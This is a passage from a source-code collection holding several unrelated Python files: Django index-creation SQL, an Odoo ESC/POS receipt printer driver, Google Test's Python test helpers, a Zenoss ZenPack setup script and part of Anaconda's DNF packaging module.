if tablespace:
sql = self.connection.ops.tablespace_sql(tablespace)
if sql:
tablespace_sql = ' ' + sql
else:
tablespace_sql = ''
else:
tablespace_sql = ''
def get_index_sql(index_name, opclass=''):
return (style.SQL_KEYWORD('CREATE INDEX') + ' ' +
style.SQL_TABLE(qn(truncate_name(index_name,self.connection.ops.max_name_length()))) + ' ' +
style.SQL_KEYWORD('ON') + ' ' +
style.SQL_TABLE(qn(db_table)) + ' ' +
"(%s%s)" % (style.SQL_FIELD(qn(f.column)), opclass) +
"%s;" % tablespace_sql)
output = [get_index_sql('%s_%s' % (db_table, f.column))]
# Fields with database column types of `varchar` and `text` need
# a second index that specifies their operator class, which is
# needed when performing correct LIKE queries outside the
# C locale. See #12234.
db_type = f.db_type(connection=self.connection)
if db_type.startswith('varchar'):
output.append(get_index_sql('%s_%s_like' % (db_table, f.column),
' varchar_pattern_ops'))
elif db_type.startswith('text'):
output.append(get_index_sql('%s_%s_like' % (db_table, f.column),
' text_pattern_ops'))
else:
output = []
return output
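# Illustrative output (hypothetical model): for a CharField column "slug" with
# db_index=True on a table "blog_entry", this method returns roughly:
#   CREATE INDEX "blog_entry_slug" ON "blog_entry" ("slug");
#   CREATE INDEX "blog_entry_slug_like" ON "blog_entry" ("slug" varchar_pattern_ops);
# The second, opclass-specific index is what lets LIKE 'prefix%' queries use
# an index outside the C locale, as the comment above explains.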
| bsd-3-clause |
Fl0rianFischer/sme_odoo | addons/hw_escpos/escpos/printer.py | 101 | 6802 | #!/usr/bin/python
import usb.core
import usb.util
import serial
import socket
from escpos import *
from constants import *
from exceptions import *
from time import sleep
class Usb(Escpos):
""" Define USB printer """
def __init__(self, idVendor, idProduct, interface=0, in_ep=0x82, out_ep=0x01):
"""
@param idVendor : Vendor ID
@param idProduct : Product ID
@param interface : USB device interface
@param in_ep : Input end point
@param out_ep : Output end point
"""
self.errorText = "ERROR PRINTER\n\n\n\n\n\n"+PAPER_FULL_CUT
self.idVendor = idVendor
self.idProduct = idProduct
self.interface = interface
self.in_ep = in_ep
self.out_ep = out_ep
self.open()
def open(self):
""" Search device on USB tree and set is as escpos device """
self.device = usb.core.find(idVendor=self.idVendor, idProduct=self.idProduct)
if self.device is None:
raise NoDeviceError()
try:
if self.device.is_kernel_driver_active(self.interface):
self.device.detach_kernel_driver(self.interface)
self.device.set_configuration()
usb.util.claim_interface(self.device, self.interface)
except usb.core.USBError as e:
raise HandleDeviceError(e)
def close(self):
i = 0
while True:
try:
if not self.device.is_kernel_driver_active(self.interface):
usb.util.release_interface(self.device, self.interface)
self.device.attach_kernel_driver(self.interface)
usb.util.dispose_resources(self.device)
else:
self.device = None
return True
except usb.core.USBError as e:
i += 1
if i > 10:
return False
sleep(0.1)
def _raw(self, msg):
""" Print any command sent in raw format """
if len(msg) != self.device.write(self.out_ep, msg, self.interface):
self.device.write(self.out_ep, self.errorText, self.interface)
raise TicketNotPrinted()
def __extract_status(self):
maxiterate = 0
rep = None
while rep == None:
maxiterate += 1
if maxiterate > 10000:
raise NoStatusError()
r = self.device.read(self.in_ep, 20, self.interface).tolist()
while len(r):
rep = r.pop()
return rep
def get_printer_status(self):
status = {
'printer': {},
'offline': {},
'error' : {},
'paper' : {},
}
self.device.write(self.out_ep, DLE_EOT_PRINTER, self.interface)
printer = self.__extract_status()
self.device.write(self.out_ep, DLE_EOT_OFFLINE, self.interface)
offline = self.__extract_status()
self.device.write(self.out_ep, DLE_EOT_ERROR, self.interface)
error = self.__extract_status()
self.device.write(self.out_ep, DLE_EOT_PAPER, self.interface)
paper = self.__extract_status()
status['printer']['status_code'] = printer
status['printer']['status_error'] = not ((printer & 147) == 18)
status['printer']['online'] = not bool(printer & 8)
status['printer']['recovery'] = bool(printer & 32)
status['printer']['paper_feed_on'] = bool(printer & 64)
status['printer']['drawer_pin_high'] = bool(printer & 4)
status['offline']['status_code'] = offline
status['offline']['status_error'] = not ((offline & 147) == 18)
status['offline']['cover_open'] = bool(offline & 4)
status['offline']['paper_feed_on'] = bool(offline & 8)
status['offline']['paper'] = not bool(offline & 32)
status['offline']['error'] = bool(offline & 64)
status['error']['status_code'] = error
status['error']['status_error'] = not ((error & 147) == 18)
status['error']['recoverable'] = bool(error & 4)
status['error']['autocutter'] = bool(error & 8)
status['error']['unrecoverable'] = bool(error & 32)
status['error']['auto_recoverable'] = not bool(error & 64)
status['paper']['status_code'] = paper
status['paper']['status_error'] = not ((paper & 147) == 18)
status['paper']['near_end'] = bool(paper & 12)
status['paper']['present'] = not bool(paper & 96)
return status
def __del__(self):
""" Release USB interface """
if self.device:
self.close()
self.device = None
class Serial(Escpos):
""" Define Serial printer """
def __init__(self, devfile="/dev/ttyS0", baudrate=9600, bytesize=8, timeout=1):
"""
@param devfile : Device file under dev filesystem
@param baudrate : Baud rate for serial transmission
@param bytesize : Serial buffer size
@param timeout : Read/Write timeout
"""
self.devfile = devfile
self.baudrate = baudrate
self.bytesize = bytesize
self.timeout = timeout
self.open()
def open(self):
""" Setup serial port and set is as escpos device """
self.device = serial.Serial(port=self.devfile, baudrate=self.baudrate, bytesize=self.bytesize, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, timeout=self.timeout, dsrdtr=True)
if self.device is not None:
print "Serial printer enabled"
else:
print "Unable to open serial printer on: %s" % self.devfile
def _raw(self, msg):
""" Print any command sent in raw format """
self.device.write(msg)
def __del__(self):
""" Close Serial interface """
if self.device is not None:
self.device.close()
class Network(Escpos):
""" Define Network printer """
def __init__(self,host,port=9100):
"""
@param host : Printer's hostname or IP address
@param port : Port to write to
"""
self.host = host
self.port = port
self.open()
def open(self):
""" Open TCP socket and set it as escpos device """
self.device = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.device.connect((self.host, self.port))
if self.device is None:
print "Could not open socket for %s" % self.host
def _raw(self, msg):
self.device.send(msg)
def __del__(self):
""" Close TCP connection """
self.device.close()
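# Illustrative usage sketch (the device identifiers below are examples only,
# not defaults shipped with this module):
#   printer = Network("192.168.1.100")    # raw socket printing on port 9100
#   printer = Serial("/dev/ttyS0", 9600)  # serial-attached printer
#   printer = Usb(0x04b8, 0x0202)         # USB printer by vendor/product id
# The three classes only differ in how _raw() delivers bytes to the device;
# the higher-level printing helpers come from the shared Escpos base class.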
| gpl-3.0 |
windyuuy/opera | chromium/src/testing/gtest/test/gtest_test_utils.py | 408 | 10444 | #!/usr/bin/env python
#
# Copyright 2006, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit test utilities for Google C++ Testing Framework."""
__author__ = 'wan@google.com (Zhanyong Wan)'
import atexit
import os
import shutil
import sys
import tempfile
import unittest
_test_module = unittest
# Suppresses the 'Import not at the top of the file' lint complaint.
# pylint: disable-msg=C6204
try:
import subprocess
_SUBPROCESS_MODULE_AVAILABLE = True
except:
import popen2
_SUBPROCESS_MODULE_AVAILABLE = False
# pylint: enable-msg=C6204
GTEST_OUTPUT_VAR_NAME = 'GTEST_OUTPUT'
IS_WINDOWS = os.name == 'nt'
IS_CYGWIN = os.name == 'posix' and 'CYGWIN' in os.uname()[0]
# Here we expose a class from a particular module, depending on the
# environment. The comment suppresses the 'Invalid variable name' lint
# complaint.
TestCase = _test_module.TestCase # pylint: disable-msg=C6409
# Initially maps a flag to its default value. After
# _ParseAndStripGTestFlags() is called, maps a flag to its actual value.
_flag_map = {'source_dir': os.path.dirname(sys.argv[0]),
'build_dir': os.path.dirname(sys.argv[0])}
_gtest_flags_are_parsed = False
def _ParseAndStripGTestFlags(argv):
"""Parses and strips Google Test flags from argv. This is idempotent."""
# Suppresses the lint complaint about a global variable since we need it
# here to maintain module-wide state.
global _gtest_flags_are_parsed # pylint: disable-msg=W0603
if _gtest_flags_are_parsed:
return
_gtest_flags_are_parsed = True
for flag in _flag_map:
# The environment variable overrides the default value.
if flag.upper() in os.environ:
_flag_map[flag] = os.environ[flag.upper()]
# The command line flag overrides the environment variable.
i = 1 # Skips the program name.
while i < len(argv):
prefix = '--' + flag + '='
if argv[i].startswith(prefix):
_flag_map[flag] = argv[i][len(prefix):]
del argv[i]
break
else:
# We don't increment i in case we just found a --gtest_* flag
# and removed it from argv.
i += 1
def GetFlag(flag):
"""Returns the value of the given flag."""
# In case GetFlag() is called before Main(), we always call
# _ParseAndStripGTestFlags() here to make sure the --gtest_* flags
# are parsed.
_ParseAndStripGTestFlags(sys.argv)
return _flag_map[flag]
def GetSourceDir():
"""Returns the absolute path of the directory where the .py files are."""
return os.path.abspath(GetFlag('source_dir'))
def GetBuildDir():
"""Returns the absolute path of the directory where the test binaries are."""
return os.path.abspath(GetFlag('build_dir'))
_temp_dir = None
def _RemoveTempDir():
if _temp_dir:
shutil.rmtree(_temp_dir, ignore_errors=True)
atexit.register(_RemoveTempDir)
def GetTempDir():
"""Returns a directory for temporary files."""
global _temp_dir
if not _temp_dir:
_temp_dir = tempfile.mkdtemp()
return _temp_dir
def GetTestExecutablePath(executable_name, build_dir=None):
"""Returns the absolute path of the test binary given its name.
The function will print a message and abort the program if the resulting file
doesn't exist.
Args:
executable_name: name of the test binary that the test script runs.
build_dir: directory where to look for executables, by default
the result of GetBuildDir().
Returns:
The absolute path of the test binary.
"""
path = os.path.abspath(os.path.join(build_dir or GetBuildDir(),
executable_name))
if (IS_WINDOWS or IS_CYGWIN) and not path.endswith('.exe'):
path += '.exe'
if not os.path.exists(path):
message = (
'Unable to find the test binary. Please make sure to provide path\n'
'to the binary via the --build_dir flag or the BUILD_DIR\n'
'environment variable.')
print >> sys.stderr, message
sys.exit(1)
return path
def GetExitStatus(exit_code):
"""Returns the argument to exit(), or -1 if exit() wasn't called.
Args:
exit_code: the result value of os.system(command).
"""
if os.name == 'nt':
# On Windows, os.WEXITSTATUS() doesn't work and os.system() returns
# the argument to exit() directly.
return exit_code
else:
# On Unix, os.WEXITSTATUS() must be used to extract the exit status
# from the result of os.system().
if os.WIFEXITED(exit_code):
return os.WEXITSTATUS(exit_code)
else:
return -1
class Subprocess:
def __init__(self, command, working_dir=None, capture_stderr=True, env=None):
"""Changes into a specified directory, if provided, and executes a command.
Restores the old directory afterwards.
Args:
command: The command to run, in the form of sys.argv.
working_dir: The directory to change into.
capture_stderr: Determines whether to capture stderr in the output member
or to discard it.
env: Dictionary with environment to pass to the subprocess.
Returns:
An object that represents outcome of the executed process. It has the
following attributes:
terminated_by_signal True iff the child process has been terminated
by a signal.
        signal                 Signal that terminated the child process.
exited True iff the child process exited normally.
exit_code The code with which the child process exited.
output Child process's stdout and stderr output
combined in a string.
"""
    # The subprocess module is the preferable way of running programs
# since it is available and behaves consistently on all platforms,
# including Windows. But it is only available starting in python 2.4.
# In earlier python versions, we revert to the popen2 module, which is
# available in python 2.0 and later but doesn't provide required
# functionality (Popen4) under Windows. This allows us to support Mac
# OS X 10.4 Tiger, which has python 2.3 installed.
if _SUBPROCESS_MODULE_AVAILABLE:
if capture_stderr:
stderr = subprocess.STDOUT
else:
stderr = subprocess.PIPE
p = subprocess.Popen(command,
stdout=subprocess.PIPE, stderr=stderr,
cwd=working_dir, universal_newlines=True, env=env)
      # communicate returns a tuple with the file object for the child's
# output.
self.output = p.communicate()[0]
self._return_code = p.returncode
else:
old_dir = os.getcwd()
def _ReplaceEnvDict(dest, src):
# Changes made by os.environ.clear are not inheritable by child
# processes until Python 2.6. To produce inheritable changes we have
# to delete environment items with the del statement.
for key in dest.keys():
del dest[key]
dest.update(src)
# When 'env' is not None, backup the environment variables and replace
# them with the passed 'env'. When 'env' is None, we simply use the
# current 'os.environ' for compatibility with the subprocess.Popen
# semantics used above.
if env is not None:
old_environ = os.environ.copy()
_ReplaceEnvDict(os.environ, env)
try:
if working_dir is not None:
os.chdir(working_dir)
if capture_stderr:
p = popen2.Popen4(command)
else:
p = popen2.Popen3(command)
p.tochild.close()
self.output = p.fromchild.read()
ret_code = p.wait()
finally:
os.chdir(old_dir)
# Restore the old environment variables
# if they were replaced.
if env is not None:
_ReplaceEnvDict(os.environ, old_environ)
# Converts ret_code to match the semantics of
# subprocess.Popen.returncode.
if os.WIFSIGNALED(ret_code):
self._return_code = -os.WTERMSIG(ret_code)
else: # os.WIFEXITED(ret_code) should return True here.
self._return_code = os.WEXITSTATUS(ret_code)
if self._return_code < 0:
self.terminated_by_signal = True
self.exited = False
self.signal = -self._return_code
else:
self.terminated_by_signal = False
self.exited = True
self.exit_code = self._return_code
def Main():
"""Runs the unit test."""
# We must call _ParseAndStripGTestFlags() before calling
# unittest.main(). Otherwise the latter will be confused by the
# --gtest_* flags.
_ParseAndStripGTestFlags(sys.argv)
# The tested binaries should not be writing XML output files unless the
# script explicitly instructs them to.
# TODO(vladl@google.com): Move this into Subprocess when we implement
# passing environment into it as a parameter.
if GTEST_OUTPUT_VAR_NAME in os.environ:
del os.environ[GTEST_OUTPUT_VAR_NAME]
_test_module.main()
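# Illustrative usage sketch from a hypothetical test script built on this
# module (the binary name below is an example only):
#   import gtest_test_utils
#   COMMAND = gtest_test_utils.GetTestExecutablePath('gtest_output_test_')
#   class MyTest(gtest_test_utils.TestCase):
#     def testListsTests(self):
#       p = gtest_test_utils.Subprocess([COMMAND, '--gtest_list_tests'])
#       self.assertTrue(p.exited)
#       self.assertEqual(0, p.exit_code)
#   if __name__ == '__main__':
#     gtest_test_utils.Main()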
| bsd-3-clause |
anksp21/Community-Zenpacks | ZenPacks.AndreaConsadori.MSIAS_RadiusServer/setup.py | 2 | 2644 | ################################
# These variables are overwritten by Zenoss when the ZenPack is exported
# or saved. Do not modify them directly here.
# NB: PACKAGES is deprecated
NAME = 'ZenPacks.AndreaConsadori.MSIAS_RadiusServer'
VERSION = '3.0'
AUTHOR = 'Andrea Consadori'
LICENSE = 'GPLv2'
NAMESPACE_PACKAGES = ['ZenPacks', 'ZenPacks.AndreaConsadori']
PACKAGES = ['ZenPacks', 'ZenPacks.AndreaConsadori', 'ZenPacks.AndreaConsadori.MSIAS_RadiusServer']
INSTALL_REQUIRES = []
COMPAT_ZENOSS_VERS = '>=3.0'
PREV_ZENPACK_NAME = ''
# STOP_REPLACEMENTS
################################
# Zenoss will not overwrite any changes you make below here.
from setuptools import setup, find_packages
setup(
# This ZenPack metadata should usually be edited with the Zenoss
# ZenPack edit page. Whenever the edit page is submitted it will
# overwrite the values below (the ones it knows about) with new values.
name = NAME,
version = VERSION,
author = AUTHOR,
license = LICENSE,
# This is the version spec which indicates what versions of Zenoss
# this ZenPack is compatible with
compatZenossVers = COMPAT_ZENOSS_VERS,
# previousZenPackName is a facility for telling Zenoss that the name
# of this ZenPack has changed. If no ZenPack with the current name is
# installed, then an installed ZenPack with the previous name will be upgraded.
prevZenPackName = PREV_ZENPACK_NAME,
# Indicate to setuptools which namespace packages the zenpack
# participates in
namespace_packages = NAMESPACE_PACKAGES,
# Tell setuptools what packages this zenpack provides.
packages = find_packages(),
# Tell setuptools to figure out for itself which files to include
# in the binary egg when it is built.
include_package_data = True,
# The MANIFEST.in file is the recommended way of including additional files
# in your ZenPack. package_data is another.
#package_data = {}
# Indicate dependencies on other python modules or ZenPacks. This line
# is modified by zenoss when the ZenPack edit page is submitted. Zenoss
# tries to add/delete the names it manages at the beginning of this
# list, so any manual additions should be added to the end. Things will
# go poorly if this line is broken into multiple lines or modified too
# dramatically.
install_requires = INSTALL_REQUIRES,
# Every ZenPack egg must define exactly one zenoss.zenpacks entry point
# of this form.
entry_points = {
'zenoss.zenpacks': '%s = %s' % (NAME, NAME),
},
# All ZenPack eggs must be installed in unzipped form.
zip_safe = False,
)
| gpl-2.0 |
karmix/anaconda | pyanaconda/packaging/dnfpayload.py | 2 | 35909 | # dnfpayload.py
# DNF/rpm software payload management.
#
# Copyright (C) 2013 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
# Red Hat Author(s): Ales Kozumplik <akozumpl@redhat.com>
#
import os
from blivet.size import Size
import blivet.arch
from pyanaconda.flags import flags
from pyanaconda.i18n import _, N_
from pyanaconda.progress import progressQ, progress_message
from pyanaconda.simpleconfig import simple_replace
import configparser
import collections
import itertools
import logging
import multiprocessing
import operator
from pyanaconda import constants
from pykickstart.constants import GROUP_ALL, GROUP_DEFAULT, KS_MISSING_IGNORE
import pyanaconda.errors as errors
import pyanaconda.iutil
import pyanaconda.localization
import pyanaconda.packaging as packaging
import shutil
import sys
import time
import threading
from pyanaconda.iutil import ProxyString, ProxyStringError
from pyanaconda.iutil import open # pylint: disable=redefined-builtin
log = logging.getLogger("packaging")
import dnf
import dnf.exceptions
import dnf.repo
import dnf.callback
import rpm
DNF_CACHE_DIR = '/tmp/dnf.cache'
DNF_PLUGINCONF_DIR = '/tmp/dnf.pluginconf'
DNF_PACKAGE_CACHE_DIR_SUFFIX = 'dnf.package.cache'
DOWNLOAD_MPOINTS = {'/tmp',
'/',
'/mnt/sysimage',
'/mnt/sysimage/home',
'/mnt/sysimage/tmp',
'/mnt/sysimage/var',
}
REPO_DIRS = ['/etc/yum.repos.d',
'/etc/anaconda.repos.d',
'/tmp/updates/anaconda.repos.d',
'/tmp/product/anaconda.repos.d']
YUM_REPOS_DIR = "/etc/yum.repos.d/"
_DNF_INSTALLER_LANGPACK_CONF = DNF_PLUGINCONF_DIR + "/langpacks.conf"
_DNF_TARGET_LANGPACK_CONF = "/etc/dnf/plugins/langpacks.conf"
def _failure_limbo():
progressQ.send_quit(1)
while True:
time.sleep(10000)
def _df_map():
"""Return (mountpoint -> size available) mapping."""
output = pyanaconda.iutil.execWithCapture('df', ['--output=target,avail'])
output = output.rstrip()
lines = output.splitlines()
structured = {}
for line in lines:
items = line.split()
key = items[0]
val = items[1]
if not key.startswith('/'):
continue
structured[key] = Size(int(val)*1024)
return structured
def _paced(fn):
"""Execute `fn` no more often then every 2 seconds."""
def paced_fn(self, *args):
now = time.time()
if now - self.last_time < 2:
return
self.last_time = now
return fn(self, *args)
return paced_fn
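# Illustrative sketch (not part of the original module): _paced expects the
# decorated method's instance to carry a last_time attribute, e.g.
#   class Reporter(object):
#       def __init__(self):
#           self.last_time = time.time()
#       @_paced
#       def report(self, msg):
#           progressQ.send_message(msg)
# Rapid calls to report() are silently dropped until 2 seconds have elapsed,
# which is how DownloadProgress._update below keeps progress traffic low.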
def _pick_mpoint(df, download_size, install_size):
def reasonable_mpoint(mpoint):
return mpoint in DOWNLOAD_MPOINTS
requested = download_size
requested_root = requested + install_size
root_mpoint = pyanaconda.iutil.getSysroot()
sufficients = {key : val for (key, val) in df.items()
                   # for root we need to take into account both download and install size
if ((key != root_mpoint and val > requested)
or val > requested_root) and reasonable_mpoint(key)}
log.debug('Estimated size: download %s & install %s - df: %s', requested,
(requested_root - requested), df)
log.info('Sufficient mountpoints found: %s', sufficients)
if not len(sufficients):
return None
# default to the biggest one:
return sorted(sufficients.items(), key=operator.itemgetter(1),
reverse=True)[0][0]
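# Worked example (hypothetical numbers): with df mapping '/tmp' to 5 GiB and
# '/mnt/sysimage' to 20 GiB, a download_size of 1 GiB and an install_size of
# 4 GiB, '/tmp' qualifies because it only has to hold the download, while the
# sysroot must hold download + install (20 GiB > 5 GiB); the larger candidate,
# '/mnt/sysimage', is returned. This assumes getSysroot() is '/mnt/sysimage',
# its usual value during installation.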
class PayloadRPMDisplay(dnf.callback.LoggingTransactionDisplay):
def __init__(self, queue_instance):
super(PayloadRPMDisplay, self).__init__()
self._queue = queue_instance
self._last_ts = None
self.cnt = 0
def event(self, package, action, te_current, te_total, ts_current, ts_total):
if action == self.PKG_INSTALL and te_current == 0:
# do not report same package twice
if self._last_ts == ts_current:
return
self._last_ts = ts_current
msg = '%s.%s (%d/%d)' % \
(package.name, package.arch, ts_current, ts_total)
self.cnt += 1
self._queue.put(('install', msg))
elif action == self.TRANS_POST:
self._queue.put(('post', None))
class DownloadProgress(dnf.callback.DownloadProgress):
def __init__(self):
self.downloads = collections.defaultdict(int)
self.last_time = time.time()
self.total_files = 0
self.total_size = Size(0)
@_paced
def _update(self):
msg = _('Downloading %(total_files)s RPMs, '
'%(downloaded)s / %(total_size)s (%(percent)d%%) done.')
downloaded = Size(sum(self.downloads.values()))
vals = {
'downloaded' : downloaded,
'percent' : int(100 * downloaded/self.total_size),
'total_files' : self.total_files,
'total_size' : self.total_size
}
progressQ.send_message(msg % vals)
def end(self, payload, status, err_msg):
nevra = str(payload)
if status is dnf.callback.STATUS_OK:
self.downloads[nevra] = payload.download_size
self._update()
return
log.warning("Failed to download '%s': %d - %s", nevra, status, err_msg)
def progress(self, payload, done):
nevra = str(payload)
self.downloads[nevra] = done
self._update()
def start(self, total_files, total_size):
self.total_files = total_files
self.total_size = Size(total_size)
def do_transaction(base, queue_instance):
try:
display = PayloadRPMDisplay(queue_instance)
base.do_transaction(display=display)
except BaseException as e:
log.error('The transaction process has ended abruptly')
log.info(e)
queue_instance.put(('quit', str(e)))
class DNFPayload(packaging.PackagePayload):
def __init__(self, data):
packaging.PackagePayload.__init__(self, data)
self._base = None
self._download_location = None
self._configure()
# Protect access to _base.repos to ensure that the dictionary is not
# modified while another thread is attempting to iterate over it. The
# lock only needs to be held during operations that change the number
# of repos or that iterate over the repos.
self._repos_lock = threading.RLock()
def unsetup(self):
super(DNFPayload, self).unsetup()
self._base = None
self._configure()
def _replace_vars(self, url):
""" Replace url variables with their values
:param url: url string to do replacement on
:type url: string
:returns: string with variables substituted
:rtype: string or None
Currently supports $releasever and $basearch
"""
if not url:
return url
url = url.replace("$releasever", self._base.conf.releasever)
url = url.replace("$basearch", blivet.arch.getArch())
return url
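    # Illustrative example (hypothetical mirror URL): with releasever '23' and
    # basearch 'x86_64', "http://mirror.example.com/fedora/$releasever/$basearch/os/"
    # becomes "http://mirror.example.com/fedora/23/x86_64/os/".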
def _add_repo(self, ksrepo):
"""Add a repo to the dnf repo object
:param ksrepo: Kickstart Repository to add
:type ksrepo: Kickstart RepoData object.
:returns: None
"""
repo = dnf.repo.Repo(ksrepo.name, DNF_CACHE_DIR)
url = self._replace_vars(ksrepo.baseurl)
mirrorlist = self._replace_vars(ksrepo.mirrorlist)
if url and url.startswith("nfs://"):
(server, path) = url[6:].split(":", 1)
mountpoint = "%s/%s.nfs" % (constants.MOUNT_DIR, repo.name)
self._setupNFS(mountpoint, server, path, None)
url = "file://" + mountpoint
if url:
repo.baseurl = [url]
if mirrorlist:
repo.mirrorlist = mirrorlist
repo.sslverify = not (ksrepo.noverifyssl or flags.noverifyssl)
if ksrepo.proxy:
try:
repo.proxy = ProxyString(ksrepo.proxy).url
except ProxyStringError as e:
log.error("Failed to parse proxy for _add_repo %s: %s",
ksrepo.proxy, e)
if ksrepo.cost:
repo.cost = ksrepo.cost
if ksrepo.includepkgs:
repo.include = ksrepo.includepkgs
if ksrepo.excludepkgs:
repo.exclude = ksrepo.excludepkgs
# If this repo is already known, it's one of two things:
# (1) The user is trying to do "repo --name=updates" in a kickstart file
# and we should just know to enable the already existing on-disk
# repo config.
# (2) It's a duplicate, and we need to delete the existing definition
# and use this new one. The highest profile user of this is livecd
# kickstarts.
if repo.id in self._base.repos:
if not url and not mirrorlist:
self._base.repos[repo.id].enable()
else:
with self._repos_lock:
self._base.repos.pop(repo.id)
self._base.repos.add(repo)
repo.enable()
# If the repo's not already known, we've got to add it.
else:
with self._repos_lock:
self._base.repos.add(repo)
repo.enable()
# Load the metadata to verify that the repo is valid
try:
self._base.repos[repo.id].load()
except dnf.exceptions.RepoError as e:
raise packaging.MetadataError(e)
log.info("added repo: '%s' - %s", ksrepo.name, url or mirrorlist)
def addRepo(self, ksrepo):
"""Add a repo to dnf and kickstart repo lists
:param ksrepo: Kickstart Repository to add
:type ksrepo: Kickstart RepoData object.
:returns: None
"""
self._add_repo(ksrepo)
super(DNFPayload, self).addRepo(ksrepo)
def _apply_selections(self):
if self.data.packages.nocore:
log.info("skipping core group due to %%packages --nocore; system may not be complete")
else:
try:
self._select_group('core', required=True)
log.info("selected group: core")
except packaging.NoSuchGroup as e:
self._miss(e)
env = None
if self.data.packages.default and self.environments:
env = self.environments[0]
elif self.data.packages.environment:
env = self.data.packages.environment
excludedGroups = [group.name for group in self.data.packages.excludedGroupList]
if env:
try:
self._select_environment(env, excludedGroups)
log.info("selected env: %s", env)
except packaging.NoSuchGroup as e:
self._miss(e)
for group in self.data.packages.groupList:
if group.name == 'core' or group.name in excludedGroups:
continue
default = group.include in (GROUP_ALL,
GROUP_DEFAULT)
optional = group.include == GROUP_ALL
try:
self._select_group(group.name, default=default, optional=optional)
log.info("selected group: %s", group.name)
except packaging.NoSuchGroup as e:
self._miss(e)
for pkg_name in set(self.data.packages.packageList) - set(self.data.packages.excludedList):
try:
self._install_package(pkg_name)
log.info("selected package: '%s'", pkg_name)
except packaging.NoSuchPackage as e:
self._miss(e)
self._select_kernel_package()
for pkg_name in self.requiredPackages:
try:
self._install_package(pkg_name, required=True)
log.debug("selected required package: %s", pkg_name)
except packaging.NoSuchPackage as e:
self._miss(e)
for group in self.requiredGroups:
try:
self._select_group(group, required=True)
log.debug("selected required group: %s", group)
except packaging.NoSuchGroup as e:
self._miss(e)
def _bump_tx_id(self):
if self.txID is None:
self.txID = 1
else:
self.txID += 1
return self.txID
def _configure(self):
self._base = dnf.Base()
conf = self._base.conf
conf.cachedir = DNF_CACHE_DIR
conf.pluginconfpath = DNF_PLUGINCONF_DIR
conf.logdir = '/tmp/'
# disable console output completely:
conf.debuglevel = 0
conf.errorlevel = 0
self._base.logging.setup_from_dnf_conf(conf)
conf.releasever = self._getReleaseVersion(None)
conf.installroot = pyanaconda.iutil.getSysroot()
conf.prepend_installroot('persistdir')
# NSS won't survive the forking we do to shield out chroot during
# transaction, disable it in RPM:
conf.tsflags.append('nocrypto')
if self.data.packages.multiLib:
conf.multilib_policy = "all"
if hasattr(self.data.method, "proxy") and self.data.method.proxy:
try:
proxy = ProxyString(self.data.method.proxy)
conf.proxy = proxy.noauth_url
if proxy.username:
conf.proxy_username = proxy.username
if proxy.password:
conf.proxy_password = proxy.password
log.info("Using %s as proxy", self.data.method.proxy)
except ProxyStringError as e:
log.error("Failed to parse proxy for dnf configure %s: %s",
self.data.method.proxy, e)
# Start with an empty comps so we can go ahead and use the environment
# and group properties. Unset reposdir to ensure dnf has nothing it can
# check automatically
conf.reposdir = []
self._base.read_comps()
conf.reposdir = REPO_DIRS
@property
def _download_space(self):
transaction = self._base.transaction
if transaction is None:
return Size(0)
size = sum(tsi.installed.downloadsize for tsi in transaction)
# reserve extra
return Size(size) + Size("150 MB")
def _install_package(self, pkg_name, required=False):
try:
return self._base.install(pkg_name)
except dnf.exceptions.MarkingError:
raise packaging.NoSuchPackage(pkg_name, required=required)
def _miss(self, exn):
if self.data.packages.handleMissing == KS_MISSING_IGNORE:
return
log.error('Missed: %r', exn)
if errors.errorHandler.cb(exn) == errors.ERROR_RAISE:
# The progress bar polls kind of slowly, thus installation could
# still continue for a bit before the quit message is processed.
# Doing a sys.exit also ensures the running thread quits before
# it can do anything else.
progressQ.send_quit(1)
pyanaconda.iutil.ipmi_report(constants.IPMI_ABORTED)
sys.exit(1)
def _pick_download_location(self):
download_size = self._download_space
install_size = self._spaceRequired()
df_map = _df_map()
mpoint = _pick_mpoint(df_map, download_size, install_size)
if mpoint is None:
msg = "Not enough disk space to download the packages."
raise packaging.PayloadError(msg)
pkgdir = '%s/%s' % (mpoint, DNF_PACKAGE_CACHE_DIR_SUFFIX)
with self._repos_lock:
for repo in self._base.repos.iter_enabled():
repo.pkgdir = pkgdir
return pkgdir
def _select_group(self, group_id, default=True, optional=False, required=False):
grp = self._base.comps.group_by_pattern(group_id)
if grp is None:
raise packaging.NoSuchGroup(group_id, required=required)
types = {'mandatory'}
if default:
types.add('default')
if optional:
types.add('optional')
